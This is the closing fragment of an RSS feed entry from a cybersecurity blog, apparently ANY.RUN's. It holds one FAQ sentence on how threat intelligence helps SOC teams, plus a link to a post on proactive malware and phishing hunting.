<p class="schema-faq-answer">Threat intelligence helps SOC teams reduce manual investigation, validate threats faster, and turn findings into actionable data for detection and response. </p> </div> </div>
<p>The post <a href="https://any.run/cybersecurity-blog/proactive-threat-hunting/">Hunt Malware &amp; Phishing Threats with ANY.RUN for Proactive Enterprise Security</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/proactive-threat-hunting/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>